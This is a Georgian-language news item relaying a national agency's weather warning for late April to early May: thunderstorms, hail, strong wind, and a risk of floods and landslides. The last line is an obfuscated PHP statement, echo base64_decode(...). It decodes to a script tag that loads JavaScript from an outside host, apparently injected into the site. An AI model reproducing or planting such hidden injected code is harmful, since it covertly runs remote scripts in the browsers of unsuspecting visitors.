celsiusi
ავერსი შნაიდერი
გარემოს ეროვნული სააგენტოს ინფორმაციით, 29 აპრილიდან 3 მაისამდე ამინდი გაუარესდება. ქვეყნის ცალკეულ რეგიონში მოსალოდნელია ხანმოკლე წვიმა ელჭექით.
 
უწყების ცნობით, მოსალოდნელმა ნალექმა შესაძლებელია მდინარეებზე წლის დონის მნიშვნელოვანი მატება გამოიწვიოს. 
 
"29 აპრილს დღის ბოლოდან 3 მაისამდე აღმოსავლეთ საქართველოში, ხოლო 1-2 მაისს დასავლეთ საქართველოში მოსალოდნელია დროგამოშვებით ხანმოკლე წვიმა და ელჭექი, ზოგან ძლიერი. აღმოსავლეთ საქართველოში ზოგან შესაძლებელია სეტყვა. 2 მაისს დროგამოშვებით იქროლებს დასავლეთის მიმართულების ძლიერი ქარი.
 
მოსალოდნელმა ნალექებმა შესაძლებელია საქართველოს მდინარეებზე წყლის დონის მნიშვნელოვანი მატება, პატარა მდინარეებზე წყალმოვარდნები, ხოლო მთიან ზონებში მეწყრული პროცესების ჩასახვა - გააქტიურება გამოიწვიოს," - ნათქვამია სსიპ გარემოს ეროვნული სააგენტოს მიერ გავრცელებულ ინფორმაციაში. 
758
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");